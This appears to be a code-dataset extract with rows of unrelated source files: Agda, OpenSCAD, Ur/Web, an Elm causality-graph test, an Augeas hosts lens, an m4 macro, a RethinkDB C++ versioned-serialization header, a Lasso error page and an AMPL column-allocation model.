content stringlengths 4 1.04M | lang stringclasses 358 values | score int64 0 5 | repo_name stringlengths 5 114 | repo_path stringlengths 4 229 | repo_licenses listlengths 1 8 |
|---|---|---|---|---|---|
module Star where
open import Prelude
infixr 40 _•_ _++_
infixl 30 _on_
infixr 20 _==>_ _=[_]=>_
data Star {X : Set} (R : Rel X) : Rel X where
ε : {x : X} -> Star R x x
_•_ : {x y z : X} -> R x y -> Star R y z -> Star R x z
_++_ : {X : Set}{R : Rel X}{x y z : X} ->
Star R x y -> Star R y z -> Star R x z
ε ++ ys = ys
(x • xs) ++ ys = x • (xs ++ ys)
_==>_ : {X : Set} -> Rel X -> Rel X -> Set
R ==> S = forall {a b} -> R a b -> S a b
_on_ : {X Y : Set} -> (R : Rel X) -> (f : Y -> X) -> Rel Y
R on f = \a b -> R (f a) (f b)
_=[_]=>_ : {X Y : Set} (R : Rel X) (f : X -> Y) (S : Rel Y) -> Set
R =[ f ]=> S = R ==> S on f
return : {X : Set}{R : Rel X} -> R ==> Star R
return x = x • ε
module JoinMap where
join : {X : Set}{R : Rel X} -> Star (Star R) ==> Star R
join ε = ε
join (xs • xss) = xs ++ join xss
map : forall {X Y R S} -> (f : X -> Y) ->
R =[ f ]=> S -> Star R =[ f ]=> Star S
map f pm ε = ε
map f pm (x • xs) = pm x • map f pm xs
bind : forall {X Y R S} -> (f : X -> Y) ->
R =[ f ]=> Star S -> Star R =[ f ]=> Star S
bind f k m = join (map f k m)
bind : forall {X Y R S} -> (f : X -> Y) ->
R =[ f ]=> Star S -> Star R =[ f ]=> Star S
bind f k ε = ε
bind f k (x • xs) = k x ++ bind f k xs
join : {X : Set}{R : Rel X} -> Star (Star R) ==> Star R
join = bind id id
map : forall {X Y R S} -> (f : X -> Y) ->
R =[ f ]=> S -> Star R =[ f ]=> Star S
map f k = bind f (return · k)
-- Generic length
length : {X : Set}{R : Rel X} -> Star R =[ ! ]=> Star One
length = map ! !
-- Reverse
_op : {X : Set} -> Rel X -> Rel X
(R op) a b = R b a
reverse : {X : Set}{R : Rel X}{a b : X} -> Star R a b -> Star (R op) b a
reverse {X}{R} xs = rev xs ε
where
rev : forall {a b c} ->
Star R a b -> Star (R op) a c -> Star (R op) b c
rev ε ys = ys
rev (x • xs) ys = rev xs (x • ys)
| Agda | 5 | cruhland/agda | examples/AIM6/Path/Star.agda | [
"MIT"
] |
module shape()
{
difference()
{
translate([ -35, -35 ]) intersection()
{
union() {
difference() {
square(100, true);
square(50, true);
}
translate([ 50, 50 ])
square(15, true);
}
rotate(45) translate([ 0, -15 ]) square([ 100, 30 ]);
}
rotate(-45) scale([ 0.7, 1.3 ]) circle(5);
}
import(file = "example009.dxf", layer = "body",
convexity = 6, scale=2);
}
// linear_extrude(convexity = 10, center = true)
shape();
| OpenSCAD | 4 | heristhesiya/OpenJSCAD.org | packages/io/scad-deserializer/tests/examples/example015.scad | [
"MIT"
] |
signature S = sig
type t
val x : t
end
structure M : S = struct
type t = _
val x = 0
end
| UrWeb | 3 | apple314159/urweb | tests/sig_wild.ur | [
"BSD-3-Clause"
] |
module CausalityTest exposing (all)
import Application.Application as Application
import Causality.Causality as Causality
import Common exposing (initCustomOpts)
import Concourse
exposing
( Causality
, CausalityBuild
, CausalityDirection(..)
, CausalityJob
, CausalityResource
, CausalityResourceVersion
)
import Concourse.BuildStatus exposing (BuildStatus(..))
import Data exposing (featureFlags)
import Dict
import Expect
import Graph exposing (Edge, Node)
import List.Extra
import Message.Callback as Callback
import Test exposing (..)
import Test.Html.Query as Query
import Test.Html.Selector
exposing
( class
, id
, text
)
all : Test
all =
describe "causality graph" <|
[ describe "viewing graph" <|
[ test "shows not found if feature flag is disabled" <|
\_ ->
initEnabled False
|> Common.queryView
|> Query.find [ class "notfound" ]
|> Query.has [ text "404" ]
, test "shows not found if response is forbidden" <|
\_ ->
init
|> Application.handleCallback
(Callback.CausalityFetched Data.httpForbidden)
|> Tuple.first
|> Common.queryView
|> Query.find [ class "notfound" ]
|> Query.has [ text "404" ]
, test "shows error message if too large" <|
\_ ->
init
|> Application.handleCallback
(Callback.CausalityFetched Data.httpUnproccessableEntity)
|> Tuple.first
|> Common.queryView
|> Query.find [ id "causality-error" ]
|> Query.has [ text "graph too large" ]
, test "shows error message if there's no causality" <|
\_ ->
init
|> Application.handleCallback
(Callback.CausalityFetched <|
Ok
( Downstream
, Just { jobs = [], builds = [], resources = [], resourceVersions = [] }
)
)
|> Tuple.first
|> Common.queryView
|> Query.find [ id "causality-error" ]
|> Query.has [ text "no causality" ]
]
, describe "constructing downstream" <|
[ test "simple graph with 1 build and output" <|
\_ ->
Causality.constructGraph Downstream simplePipeline
|> Expect.equal
(Graph.fromNodesAndEdges
[ Node 1 <| Causality.Resource "r1" [ Causality.Version 1 someVersion ]
, Node -1 <| Causality.Job "j1" [ Causality.Build 1 "1" BuildStatusSucceeded ]
]
[ Edge 1 -1 () ]
)
, test "builds that fan out and then fan in" <|
\_ ->
Causality.constructGraph Concourse.Downstream fanOutFanInPipeline
|> Expect.equal
(Graph.fromNodesAndEdges
[ Node 1 <| Causality.Resource "r1" [ Causality.Version 1 someVersion ]
, Node 2 <| Causality.Resource "r2" [ Causality.Version 2 someVersion ]
, Node 3 <| Causality.Resource "r3" [ Causality.Version 3 someVersion ]
, Node -1 <| Causality.Job "j1" [ Causality.Build 1 "1" BuildStatusSucceeded ]
, Node -2 <| Causality.Job "j2" [ Causality.Build 2 "1" BuildStatusSucceeded ]
, Node -3 <| Causality.Job "j3" [ Causality.Build 3 "1" BuildStatusSucceeded ]
]
[ Edge 1 -1 ()
, Edge 1 -2 ()
, Edge -1 2 ()
, Edge -2 3 ()
, Edge 2 -3 ()
, Edge 3 -3 ()
]
)
, test "a resource and its descendent feeding into the same build" <|
\_ ->
Causality.constructGraph Concourse.Downstream intermediateOutputsPipeline
|> Expect.equal
(Graph.fromNodesAndEdges
[ Node 1 <| Causality.Resource "r1" [ Causality.Version 1 someVersion ]
, Node 2 <| Causality.Resource "r2" [ Causality.Version 2 someVersion ]
, Node -1 <| Causality.Job "j1" [ Causality.Build 1 "1" BuildStatusSucceeded ]
, Node -2 <| Causality.Job "j2" [ Causality.Build 2 "1" BuildStatusSucceeded ]
]
[ Edge 1 -1 ()
, Edge 1 -2 ()
, Edge -1 2 ()
, Edge 2 -2 ()
]
)
, test "multiple builds of the same job outputing different resource versions" <|
\_ ->
Causality.constructGraph Concourse.Downstream singleJobMultipleBuildsPipeline
|> Expect.equal
(Graph.fromNodesAndEdges
[ Node 1 <| Causality.Resource "r1" [ Causality.Version 1 someVersion ]
, Node 2 <| Causality.Resource "r2" [ Causality.Version 2 someVersion ]
, Node -1 <|
Causality.Job "j1"
[ Causality.Build 2 "2" BuildStatusFailed
, Causality.Build 1 "1" BuildStatusSucceeded
]
]
[ Edge 1 -1 ()
, Edge -1 2 ()
]
)
]
-- basically the same as downstream, but the edges are flipped
, describe "constructing upstream" <|
[ test "simple graph with 1 build and input" <|
\_ ->
Causality.constructGraph Upstream simplePipeline
|> Expect.equal
(Graph.fromNodesAndEdges
[ Node 1 <| Causality.Resource "r1" [ Causality.Version 1 someVersion ]
, Node -1 <| Causality.Job "j1" [ Causality.Build 1 "1" BuildStatusSucceeded ]
]
[ Edge -1 1 () ]
)
]
]
someVersion : Concourse.Version
someVersion =
Dict.fromList [ ( "v", "1" ) ]
-- figure out list of resources and jobs from passed in versions and builds
causality : List CausalityResourceVersion -> List CausalityBuild -> Causality
causality rvs builds =
let
jobs : List CausalityJob
jobs =
List.Extra.uniqueBy .jobId builds
|> List.map (\b -> ( b.jobId, List.filter (\b2 -> b2.jobId == b.jobId) builds ))
|> List.map (\( id, bs ) -> { id = id, name = "j" ++ String.fromInt id, buildIds = List.map .id bs })
resources : List CausalityResource
resources =
List.Extra.uniqueBy .resourceId rvs
|> List.map (\rv -> ( rv.resourceId, List.filter (\rv2 -> rv2.resourceId == rv.resourceId) rvs ))
|> List.map (\( id, rs ) -> { id = id, name = "r" ++ String.fromInt id, resourceVersionIds = List.map .id rs })
in
{ jobs = jobs
, builds = builds
, resources = resources
, resourceVersions = rvs
}
-- single resource feeding into single build
-- resource1 [
-- job1 build1
-- ]
simplePipeline : Causality
simplePipeline =
causality
[ CausalityResourceVersion 1 someVersion 1 [ 1 ] ]
[ CausalityBuild 1 "1" 1 BuildStatusSucceeded [] ]
-- r1 fans out into j1 and j2, the outputs of which fans back into j3
-- resource1 [
-- job1 build1 [
-- resource2 [
-- job3 build1 []
-- ]
-- job2 build1 [
-- resource3 [
-- job3 build1 []
-- ]
-- ]
-- ]
fanOutFanInPipeline : Causality
fanOutFanInPipeline =
causality
[ CausalityResourceVersion 1 someVersion 1 [ 1, 2 ]
, CausalityResourceVersion 2 someVersion 2 [ 3 ]
, CausalityResourceVersion 3 someVersion 3 [ 3 ]
]
[ CausalityBuild 1 "1" 1 BuildStatusSucceeded [ 2 ]
, CausalityBuild 2 "1" 2 BuildStatusSucceeded [ 3 ]
, CausalityBuild 3 "1" 3 BuildStatusSucceeded []
]
-- b2 uses both r1 and a downstream output of r1 as inputs
-- resource1 [
-- job1 build1 [
-- resource2 [
-- job2 build1 []
-- ]
-- ]
-- job2 build1 []
-- ]
intermediateOutputsPipeline : Causality
intermediateOutputsPipeline =
causality
[ CausalityResourceVersion 1 someVersion 1 [ 1, 2 ]
, CausalityResourceVersion 2 someVersion 2 [ 2 ]
]
[ CausalityBuild 1 "1" 1 BuildStatusSucceeded [ 2 ]
, CausalityBuild 2 "1" 2 BuildStatusSucceeded []
]
-- j1 has 2 builds; one of the builds generated an output while the other one failed
-- resource1 [
-- job1 build2 []
-- job1 build1 [resource2]
-- ]
singleJobMultipleBuildsPipeline : Causality
singleJobMultipleBuildsPipeline =
causality
[ CausalityResourceVersion 1 someVersion 1 [ 1, 2 ]
, CausalityResourceVersion 2 someVersion 2 []
]
[ CausalityBuild 1 "1" 1 BuildStatusSucceeded [ 2 ]
, CausalityBuild 2 "2" 1 BuildStatusFailed []
]
resourceVersionId : Int
resourceVersionId =
1
initEnabled : Bool -> Application.Model
initEnabled causalityEnabled =
Common.initCustom { initCustomOpts | featureFlags = { featureFlags | resource_causality = causalityEnabled } }
("/teams/"
++ Data.teamName
++ "/pipelines/"
++ Data.pipelineName
++ "/resources/"
++ Data.resourceName
++ "/causality/"
++ String.fromInt resourceVersionId
++ "/downstream"
)
init : Application.Model
init =
initEnabled True
| Elm | 5 | Caprowni/concourse | web/elm/tests/CausalityTest.elm | [
"Apache-2.0"
] |
(* Parsing /etc/hosts *)
module Hosts =
autoload xfm
(* Field separators: a run of tabs/spaces written back as tab or space. *)
let sep_tab = Util.del_ws_tab
let sep_spc = Util.del_ws_spc
(* End of line, allowing trailing whitespace before the newline. *)
let eol = del /[ \t]*\n/ "\n"
(* Optional leading whitespace at the start of a record. *)
let indent = del /[ \t]*/ ""
let comment = Util.comment
(* A line that is only whitespace, optionally with an empty "#" marker. *)
let empty = [ del /[ \t]*#?[ \t]*\n/ "\n" ]
(* One field: any run of characters excluding '#', whitespace and newline. *)
let word = /[^# \n\t]+/
(* One hosts entry: address, canonical hostname, then zero or more aliases,
   terminated by a trailing comment or end of line. *)
let record = [ seq "host" . indent .
[ label "addr" . store word ] . sep_tab .
[ label "canonical" . store word ] .
[ label "alias" . sep_spc . store word ]*
. (comment|eol) ]
(* The whole file is any mix of empty lines, comments and host records. *)
let lns = ( empty | comment | record ) *
(* Register the lens against /etc/hosts. *)
let xfm = transform lns (incl "/etc/hosts")
| Augeas | 4 | mcarbonneaux/php-augeas | tests/loadpath/hosts.aug | [
"PHP-3.01"
] |
# XCB_UTIL_M4_WITH_INCLUDE_PATH
# ------------------------------
#
# This macro attempts to locate an m4 macro processor which supports
# -I option and is only useful for modules relying on M4 in order to
# expand macros in source code files.
#
# M4: variable holding the path to a usable m4 program.
#
# This macro requires Autoconf 2.62 or later as it is relying upon
# AC_PATH_PROGS_FEATURE_CHECK macro. NOTE: As soon as the minimum
# required version of Autoconf for Xorg is bumped to 2.62, this macro
# is supposed to be shipped with xorg/util/macros.
#
AC_DEFUN([XCB_UTIL_M4_WITH_INCLUDE_PATH], [
AC_CACHE_CHECK([for m4 that supports -I option], [ac_cv_path_M4],
[AC_PATH_PROGS_FEATURE_CHECK([M4], [m4 gm4],
[[$ac_path_M4 -I. /dev/null > /dev/null 2>&1 && \
ac_cv_path_M4=$ac_path_M4 ac_path_M4_found=:]],
[AC_MSG_ERROR([could not find m4 that supports -I option])],
[$PATH:/usr/gnu/bin])])
AC_SUBST([M4], [$ac_cv_path_M4])
]) # XCB_UTIL_M4_WITH_INCLUDE_PATH
| M4 | 4 | collinwright/nixpkgs | pkgs/development/libraries/xcb-util-cursor/m4/xcb_util_m4_with_include_path.m4 | [
"MIT"
] |
// Minimal stand-in for the real "react-dom" package: the module's entire
// export is the bare string 'react-dom'.  NOTE(review): presumably a test
// fixture used to observe which module got resolved -- it provides no React
// DOM functionality; confirm against the consuming test before relying on it.
module.exports = 'react-dom';
| JavaScript | 1 | 1shenxi/webpack | test/configCases/entry/depend-on-simple/node_modules/react-dom.js | [
"MIT"
] |
#!/bin/bash
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Builds Go interop server and client in a base image.
# Abort immediately if any command below fails.
set -e
# Clone just the grpc-go source code without any dependencies.
# We are cloning from a local git repo that contains the right revision
# to test instead of using "go get" to download from Github directly.
git clone --recursive /var/local/jenkins/grpc-go src/google.golang.org/grpc
# Get all gRPC Go dependencies (build dependencies plus test-only ones).
(cd src/google.golang.org/grpc && make deps && make testdeps)
# Copy service account keys if available; "|| true" keeps a missing
# directory from aborting the script under "set -e" (best-effort step).
cp -r /var/local/jenkins/service_account $HOME || true
# Build and install the interop client and server binaries.
(cd src/google.golang.org/grpc/interop/client && go install)
(cd src/google.golang.org/grpc/interop/server && go install)
"Apache-2.0"
] |
2016-03-19 12:53:19 > fsociety (whoami@localhost) has joined &##systemau
2016-03-19 12:53:19 - Channel &##systemau: 17 nicks (2 ops, 3 halfops, 10 voices, 2 normals)
2016-03-19 12:54:22 - Mode &##systemau [+v BliTz] by localhost
2016-03-19 12:54:56 < BliTz (76561197992831293@steam) has quit (Leaving...)
| IRC log | 0 | 0x4b1dN/2016-dots | misc/weechat/logs/irc.bitlbee.&##systemau.weechatlog | [
"MIT"
] |
#ifndef CONTAINERS_ARCHIVE_VERSIONED_HPP_
#define CONTAINERS_ARCHIVE_VERSIONED_HPP_
#include <functional>
#include "containers/archive/archive.hpp"
#include "version.hpp"
namespace archive_internal {
class bogus_made_up_type_t;
} // namespace archive_internal
// These are generally universal. Their behavior must not change -- except
// if we remove some cluster_version_t value, in which case... maybe we would
// fail on a range error with the specific removed values. Or maybe we would
// do something differently.
inline void serialize_cluster_version(write_message_t *wm, cluster_version_t v) {
int8_t raw = static_cast<int8_t>(v);
serialize<cluster_version_t::LATEST_OVERALL>(wm, raw);
}
inline MUST_USE archive_result_t deserialize_cluster_version(
read_stream_t *s,
cluster_version_t *thing,
const std::function<void()> &obsolete_cb) {
// Initialize `thing` to *something* because GCC 4.6.3 thinks that `thing`
// could be used uninitialized, even when the return value of this function
// is checked through `guarantee_deserialization()`.
// See https://github.com/rethinkdb/rethinkdb/issues/2640
*thing = cluster_version_t::LATEST_OVERALL;
int8_t raw;
archive_result_t res = deserialize<cluster_version_t::LATEST_OVERALL>(s, &raw);
if (bad(res)) { return res; }
if (raw == static_cast<int8_t>(obsolete_cluster_version_t::v1_13)
|| raw == static_cast<int8_t>(obsolete_cluster_version_t::v1_13_2)) {
obsolete_cb();
crash("Outdated index handling did not crash or throw.");
} else {
if (raw >= static_cast<int8_t>(cluster_version_t::v1_14)
&& raw <= static_cast<int8_t>(cluster_version_t::v2_5)) {
*thing = static_cast<cluster_version_t>(raw);
} else {
throw archive_exc_t{"Unrecognized cluster serialization version."};
}
}
return res;
}
inline MUST_USE archive_result_t deserialize_reql_version(
read_stream_t *s, reql_version_t *thing,
const std::function<void(obsolete_reql_version_t)> &obsolete_cb) {
// Initialize `thing` to *something* because GCC 4.6.3 thinks that `thing`
// could be used uninitialized, even when the return value of this function
// is checked through `guarantee_deserialization()`.
// See https://github.com/rethinkdb/rethinkdb/issues/2640
*thing = reql_version_t::LATEST;
int8_t raw;
archive_result_t res = deserialize_universal(s, &raw);
if (bad(res)) { return res; }
if (raw < static_cast<int8_t>(reql_version_t::EARLIEST)) {
guarantee(raw >= static_cast<int8_t>(obsolete_reql_version_t::EARLIEST)
&& raw <= static_cast<int8_t>(obsolete_reql_version_t::LATEST));
obsolete_cb(static_cast<obsolete_reql_version_t>(raw));
crash("Outdated index handling did not crash or throw.");
} else {
// This is the same rassert in `ARCHIVE_PRIM_MAKE_RANGED_SERIALIZABLE`.
guarantee(raw >= static_cast<int8_t>(reql_version_t::EARLIEST)
&& raw <= static_cast<int8_t>(reql_version_t::LATEST));
*thing = static_cast<reql_version_t>(raw);
}
return res;
}
// Serializes a value for a given version. DOES NOT SERIALIZE THE VERSION NUMBER!
template <class T>
void serialize_for_version(cluster_version_t version, write_message_t *wm,
const T &value) {
// We currently only support serializing either the current disk or current
// cluster version, no previous versions.
if (version == cluster_version_t::CLUSTER) {
serialize<cluster_version_t::CLUSTER>(wm, value);
} else if (version == cluster_version_t::LATEST_DISK) {
serialize<cluster_version_t::LATEST_DISK>(wm, value);
} else {
crash("Attempted to serialize for a non-current version");
}
}
// Deserializes a value, assuming it's serialized for a given version. (This doesn't
// deserialize any version numbers.)
template <class T>
archive_result_t deserialize_for_version(cluster_version_t version,
read_stream_t *s,
T *thing) {
switch (version) {
case cluster_version_t::v1_14:
return deserialize<cluster_version_t::v1_14>(s, thing);
case cluster_version_t::v1_15:
return deserialize<cluster_version_t::v1_15>(s, thing);
case cluster_version_t::v1_16:
return deserialize<cluster_version_t::v1_16>(s, thing);
case cluster_version_t::v2_0:
return deserialize<cluster_version_t::v2_0>(s, thing);
case cluster_version_t::v2_1:
return deserialize<cluster_version_t::v2_1>(s, thing);
case cluster_version_t::v2_2:
return deserialize<cluster_version_t::v2_2>(s, thing);
case cluster_version_t::v2_3:
return deserialize<cluster_version_t::v2_3>(s, thing);
case cluster_version_t::v2_4:
return deserialize<cluster_version_t::v2_4>(s, thing);
case cluster_version_t::v2_5_is_latest:
return deserialize<cluster_version_t::v2_5_is_latest>(s, thing);
default:
unreachable("deserialize_for_version: unsupported cluster version");
}
}
// Some serialized_size needs to be visible, apparently, so that
// serialized_size_for_version will actually parse.
template <cluster_version_t W>
size_t serialized_size(const archive_internal::bogus_made_up_type_t &);
// Computes the serialized size of `thing` under the serialization format of
// the given cluster version.  Like deserialize_for_version, this does not
// handle any version numbers itself; it only dispatches to the per-version
// serialized_size instantiation.  Crashes (unreachable) on versions without
// a supported instantiation.
template <class T>
size_t serialized_size_for_version(cluster_version_t version,
                                   const T &thing) {
    switch (version) {
    case cluster_version_t::v1_14:
        return serialized_size<cluster_version_t::v1_14>(thing);
    case cluster_version_t::v1_15:
        return serialized_size<cluster_version_t::v1_15>(thing);
    case cluster_version_t::v1_16:
        return serialized_size<cluster_version_t::v1_16>(thing);
    case cluster_version_t::v2_0:
        return serialized_size<cluster_version_t::v2_0>(thing);
    case cluster_version_t::v2_1:
        return serialized_size<cluster_version_t::v2_1>(thing);
    case cluster_version_t::v2_2:
        return serialized_size<cluster_version_t::v2_2>(thing);
    case cluster_version_t::v2_3:
        return serialized_size<cluster_version_t::v2_3>(thing);
    case cluster_version_t::v2_4:
        return serialized_size<cluster_version_t::v2_4>(thing);
    case cluster_version_t::v2_5_is_latest:
        return serialized_size<cluster_version_t::v2_5_is_latest>(thing);
    default:
        // Message fixed: it previously misnamed this function as
        // "serialize_size_for_version".
        unreachable("serialized_size_for_version: unsupported version");
    }
}
// We want to express explicitly whether a given serialization function
// is used for cluster messages or disk serialization in case the latest cluster
// and latest disk versions diverge.
//
// If you see either the INSTANTIATE_SERIALIZE_FOR_CLUSTER_AND_DISK
// of INSTANTIATE_SERIALIZE_FOR_DISK macro used somewhere, you know that if you
// change the serialization format of that type that will break the disk format,
// and you should consider writing a deserialize function for the older versions.
#define INSTANTIATE_SERIALIZE_FOR_DISK(typ) \
template void serialize<cluster_version_t::LATEST_DISK>( \
write_message_t *, const typ &)
#define INSTANTIATE_SERIALIZE_FOR_CLUSTER(typ) \
template void serialize<cluster_version_t::CLUSTER>( \
write_message_t *, const typ &)
#define INSTANTIATE_DESERIALIZE_FOR_CLUSTER(typ) \
template archive_result_t deserialize<cluster_version_t::CLUSTER>( \
read_stream_t *, typ *)
#ifdef CLUSTER_AND_DISK_VERSIONS_ARE_SAME
#define INSTANTIATE_SERIALIZE_FOR_CLUSTER_AND_DISK(typ) \
template void serialize<cluster_version_t::CLUSTER>( \
write_message_t *, const typ &)
#else
#define INSTANTIATE_SERIALIZE_FOR_CLUSTER_AND_DISK(typ) \
template void serialize<cluster_version_t::CLUSTER>( \
write_message_t *, const typ &); \
template void serialize<cluster_version_t::LATEST_DISK>( \
write_message_t *, const typ &)
#endif
#define INSTANTIATE_DESERIALIZE_SINCE_v1_13(typ) \
template archive_result_t deserialize<cluster_version_t::v1_14>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v1_15>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v1_16>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_0>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_1>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_2>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_3>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_4>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_5_is_latest>( \
read_stream_t *, typ *)
#define INSTANTIATE_SERIALIZABLE_SINCE_v1_13(typ) \
INSTANTIATE_SERIALIZE_FOR_CLUSTER_AND_DISK(typ); \
INSTANTIATE_DESERIALIZE_SINCE_v1_13(typ)
#define INSTANTIATE_DESERIALIZE_SINCE_v1_16(typ) \
template archive_result_t deserialize<cluster_version_t::v1_16>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_0>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_1>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_2>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_3>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_4>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_5_is_latest>( \
read_stream_t *, typ *)
#define INSTANTIATE_SERIALIZABLE_SINCE_v1_16(typ) \
INSTANTIATE_SERIALIZE_FOR_CLUSTER_AND_DISK(typ); \
INSTANTIATE_DESERIALIZE_SINCE_v1_16(typ)
#define INSTANTIATE_DESERIALIZE_SINCE_v2_1(typ) \
template archive_result_t deserialize<cluster_version_t::v2_1>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_2>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_3>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_4>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_5_is_latest>( \
read_stream_t *, typ *)
#define INSTANTIATE_SERIALIZABLE_SINCE_v2_1(typ) \
INSTANTIATE_SERIALIZE_FOR_CLUSTER_AND_DISK(typ); \
INSTANTIATE_DESERIALIZE_SINCE_v2_1(typ)
#define INSTANTIATE_DESERIALIZE_SINCE_v2_2(typ) \
template archive_result_t deserialize<cluster_version_t::v2_2>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_3>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_4>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_5_is_latest>( \
read_stream_t *, typ *)
#define INSTANTIATE_SERIALIZABLE_SINCE_v2_2(typ) \
INSTANTIATE_SERIALIZE_FOR_CLUSTER_AND_DISK(typ); \
INSTANTIATE_DESERIALIZE_SINCE_v2_2(typ)
#define INSTANTIATE_DESERIALIZE_SINCE_v2_3(typ) \
template archive_result_t deserialize<cluster_version_t::v2_3>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_4>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_5_is_latest>( \
read_stream_t *, typ *)
#define INSTANTIATE_SERIALIZABLE_SINCE_v2_3(typ) \
INSTANTIATE_SERIALIZE_FOR_CLUSTER_AND_DISK(typ); \
INSTANTIATE_DESERIALIZE_SINCE_v2_3(typ)
#define INSTANTIATE_DESERIALIZE_SINCE_v2_4(typ) \
template archive_result_t deserialize<cluster_version_t::v2_4>( \
read_stream_t *, typ *); \
template archive_result_t deserialize<cluster_version_t::v2_5_is_latest>( \
read_stream_t *, typ *)
#define INSTANTIATE_SERIALIZABLE_SINCE_v2_4(typ) \
INSTANTIATE_SERIALIZE_FOR_CLUSTER_AND_DISK(typ); \
INSTANTIATE_DESERIALIZE_SINCE_v2_4(typ)
#define INSTANTIATE_DESERIALIZE_SINCE_v2_5(typ) \
template archive_result_t deserialize<cluster_version_t::v2_5_is_latest>( \
read_stream_t *, typ *);
#define INSTANTIATE_SERIALIZABLE_SINCE_v2_5(typ) \
INSTANTIATE_SERIALIZE_FOR_CLUSTER_AND_DISK(typ); \
INSTANTIATE_DESERIALIZE_SINCE_v2_5(typ)
#define INSTANTIATE_SERIALIZABLE_FOR_CLUSTER(typ) \
INSTANTIATE_SERIALIZE_FOR_CLUSTER(typ); \
template archive_result_t deserialize<cluster_version_t::CLUSTER>( \
read_stream_t *, typ *)
#endif // CONTAINERS_ARCHIVE_VERSIONED_HPP_
| C++ | 4 | zadcha/rethinkdb | src/containers/archive/versioned.hpp | [
"Apache-2.0"
] |
<html>
<head>
<title>Error</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body bgcolor="#FFFFFF">
<h2>An error has occurred.</h2>
<p><strong>Error Number:</strong> [Error_Code]<br>
<strong>Error Message:</strong> [Error_Msg]</p>
<p><strong>File Error:</strong> [File_CurrentError]</p>
</body>
</html>
| Lasso | 2 | fourplusone/SubEthaEdit | Documentation/ModeDevelopment/Reference Files/LassoScript-HTML/itpage/error.lasso | [
"MIT"
] |
reset;
option randseed'';
option solver cplex;
######## Definition of Workload ##########
param N := 50; # number of columns
param Q := 10*N; # number of queries
param dd :=10; # scan costs main memory
param dr := 1; # scan costs second storage
param a {i in 1..N} := Uniform(1,100); # size of column i
param b {j in 1..Q} := round(Uniform(1,2000)); # frequency of query j
param Z {j in 1..Q} := round(Uniform(0.5,10)); # average number of columns used in query j
set q {j in 1..Q} := union {1..Z[j]} {round(Uniform(1,N^(1/0.2))^0.2)}; # query j
param g {i in 1..N} := sum{j in 1..Q:card({i} inter q[j])=1} b[j];# frequency of column i
param gmax := max{i in 1..N} g[i]; # maximal frequency
param s {i in 1..N} := Uniform(0,0.1)+0.05*(g[i]/gmax)^0.01; # selectivity column i
param y {i in 1..N} := round(Uniform(0,1)); # current/old allocation
param beta default 0; # penalty reallocation
param w default 0.2; # relative budget
param A2 := sum{i in 1..N} a[i]; # maximal budget
######## Integer Solution via Linear Solver ##########
param performance_int;
param RAMused_int;
var x {i in 1..N} <=1, >=0, binary; # column i in DRAM (1 yes) or (0 no)
var z {i in 1..N} <=1, >=0, binary; # column i im DRAM (1 yes) or (0 no)
var f {j in 1..Q} = sum{i in q[j]} (dr*x[i]+dd*(1-x[i])) * a[i]*prod{k in q[j]:s[k]<s[i]} s[k];
# scan costs for query j
minimize zfkt_int: sum{j in 1..Q} b[j]*f[j] + beta * sum{i in 1..N} a[i]*z[i];
subject to nb1a: sum{i in 1..N} a[i]*x[i] <= w*A2; # budget constraint
subject to nb2a {i in 1..N}: y[i] - x[i] <= z[i]; # linearization reallocation
subject to nb3a {i in 1..N}: x[i] - y[i] <= z[i];
objective zfkt_int; solve; # solve integer program
let performance_int := sum{j in 1..Q} b[j]*f[j];
let RAMused_int :=(sum{i in 1..N} a[i]*x[i])/A2;
display x; # show column selection
display performance_int, RAMused_int;
display N, Q, _solve_elapsed_time;
######## Continuous Solution via Linear Solver ##########
param performance_cont;
param RAMused_cont;
param alpha default 100000; # penalty for budget used
var x2{i in 1..N} <=1, >=0; # column i in DRAM (1 yes) or (0 no)
var z2{i in 1..N} <=1, >=0; # column i im DRAM (1 yes) or (0 no)
var f2{j in 1..Q} = sum{i in q[j]} (dr*x2[i]+dd*(1-x2[i])) * a[i]*prod{k in q[j]:s[k]<s[i]} s[k];
# scan costs for query j
minimize zfkt_cont: sum{j in 1..Q} b[j]*f2[j] + alpha * sum{i in 1..N} a[i]*x2[i]
+ beta * sum{i in 1..N} a[i]*z2[i];
#subject to nb0 {i in 1..N:a[i]>w*A2}: x2[i] = 0;
subject to nb2b {i in 1..N}: y[i] - x2[i] <= z2[i]; # linearization reallocation
subject to nb3b {i in 1..N}: x2[i] - y[i] <= z2[i];
drop nb1a; drop nb2a; drop nb3a;
fix x; fix z;
